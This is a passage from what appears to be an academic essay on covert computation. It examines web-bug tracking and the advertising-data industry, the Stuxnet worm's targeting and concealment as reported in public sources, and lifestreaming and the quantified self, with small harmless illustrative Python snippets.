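    'time': '1999.10.27.20.56.37',                 # when they did it
}
print('http://media.preferences.com/ping?' + urlencode(report))
&amp;lt;/pre&amp;gt; &lt;br /&gt;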
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies some general information on this web bug: it has been found on over 100,000 websites across the Internet; the data collected is 'anonymous (browser type), pseudonymous (IP address)'; and the data is not shared with third parties, although no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of encounter, Google is by a long distance the biggest player in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor generates $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search); and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database, categorising the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
1. '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b. Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media] &lt;br /&gt;
*c. Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d. Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b. Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c. Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d. Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e. Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f. Retargeter: Provider of technologies that allow publishers to identify their visitors when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a. Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b. Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges. SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c. Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d. Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b. Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header, and there is currently no legal requirement that they do so in the US or elsewhere (W3C, 2012). One can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative, directions of travel is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
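Returning to the ‘do not track’ flag mentioned above, it is worth noting how technically modest it is: the user's entire opt-out preference is carried as a single HTTP request header, DNT: 1, which a receiving server is free to honour or ignore. A minimal Python sketch, using the httpbin.org echo service purely for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# The whole 'do not track' signal is one request header; sites may ignore it.
# httpbin.org is used here only as a neutral service that echoes our headers.
import urllib.request

req = urllib.request.Request('https://httpbin.org/headers',
                             headers={'DNT': '1'})
with urllib.request.urlopen(req) as resp:
    print(resp.read().decode())  # the echoed headers include our DNT flag
&amp;lt;/pre&amp;gt; &lt;br /&gt;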
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data, which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device whilst giving the impression that the user remains fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm that experts now believe was aimed at the uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and then activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file mrxcls.sys; the second part, 'xnet', from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system and playing it back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behaviour and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage, and in a targeted way, through the fatiguing of the motors: this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable the warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack: it is designed to unload its digital warheads only under specific conditions, against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm are such that at least thirty people would have had to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) the capability to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed slowly to reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuges, faking industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. 
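Drawing only on Zetter's description quoted above, the cadence of this attack can be sketched schematically. The following Python fragment is an illustrative reconstruction of the published timings, not the actual code, which was written for Siemens programmable logic controllers; the man-in-the-middle element is represented by the reported value always remaining at the nominal frequency. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Schematic reconstruction of the attack cadence Zetter describes: long
# stretches at the nominal 1,064 Hz punctuated by brief excursions to
# 1,410 Hz and 2 Hz, weeks apart, while operators see only 'normal' values.
NOMINAL, HIGH, LOW = 1064, 1410, 2  # centrifuge drive frequencies in Hz

schedule = [
    (27 * 24 * 60, NOMINAL),  # roughly 27 days of normal operation (minutes)
    (15,           HIGH),     # 15 minutes near the rotor's mechanical limit
    (27 * 24 * 60, NOMINAL),  # another 27 days of cover
    (50,           LOW),      # 50 minutes almost stalled
]

def readings(schedule):
    """Yield (real frequency, frequency reported to operators) per minute."""
    for minutes, real_hz in schedule:
        for _ in range(minutes):
            # man-in-the-middle: the control room always sees nominal values
            yield real_hz, NOMINAL

harmful = sum(1 for real, _shown in readings(schedule) if real != NOMINAL)
print('minutes of damaging operation hidden from operators:', harmful)
&amp;lt;/pre&amp;gt; &lt;br /&gt;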
The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet was hypothesised from an analysis of the approximately 15,000 lines of programming code. The analysis, performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel was involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran - 52.2% &lt;br /&gt;
**Indonesia - 17.4% &lt;br /&gt;
**India - 11.3% &lt;br /&gt;
**Pakistan - 3.6% &lt;br /&gt;
**Uzbekistan - 2.6% &lt;br /&gt;
**Russia - 2.1% &lt;br /&gt;
**Kazakhstan - 1.3% &lt;br /&gt;
**Rest of World - 9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilised against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up part of these assemblages. In the next section I want to look at willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified-self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies, called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years with the growth of ‘real-time stream’ platforms such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
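The feedback loop involved in such self-quantification can be sketched simply: a stream of self-measurements is compared against the user's own running norm, and deviations are surfaced back to the user. The following Python fragment, using invented step-count data, illustrates the principle of flagging days that depart sharply from the personal baseline. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A lifestream of daily step counts is compared against the user's own
# norm, and unusual days are flagged for 'feedback'. Data is invented.
from statistics import mean, stdev

steps = [8200, 7900, 8500, 8100, 2100, 8300, 7700, 15800, 8000, 8400]

baseline = mean(steps)
spread = stdev(steps)
for day, count in enumerate(steps, start=1):
    # flag anything more than 1.5 standard deviations from the norm
    if abs(count - baseline) > 1.5 * spread:
        print('day', day, 'is unusual:', count, 'steps')
&amp;lt;/pre&amp;gt; &lt;br /&gt;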
Lifestreams were originally an idea developed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as the ‘real-time streams’ and timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomised by Twitter, with its short, text-message-sized, 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his personal data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of the data collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS location, direction, and so forth. This is when lifestreaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
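A minimal activity in the JSON serialisation of Activity Streams 1.0 can be sketched as follows, encoding the specification's example of ‘Geraldine posted a photo to her album’; the identifiers and URLs here are invented for illustration. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal JSON Activity Streams 1.0 activity: an actor, a verb, an
# object and a target, serialised for transmission. IDs are invented.
import json
from datetime import datetime, timezone

activity = {
    'published': datetime.now(timezone.utc).isoformat(),
    'actor': {'objectType': 'person',
              'id': 'urn:example:person:geraldine',
              'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo',
               'url': 'http://example.org/photos/1'},
    'target': {'objectType': 'photo-album',
               'displayName': 'Holiday 2012'},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;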
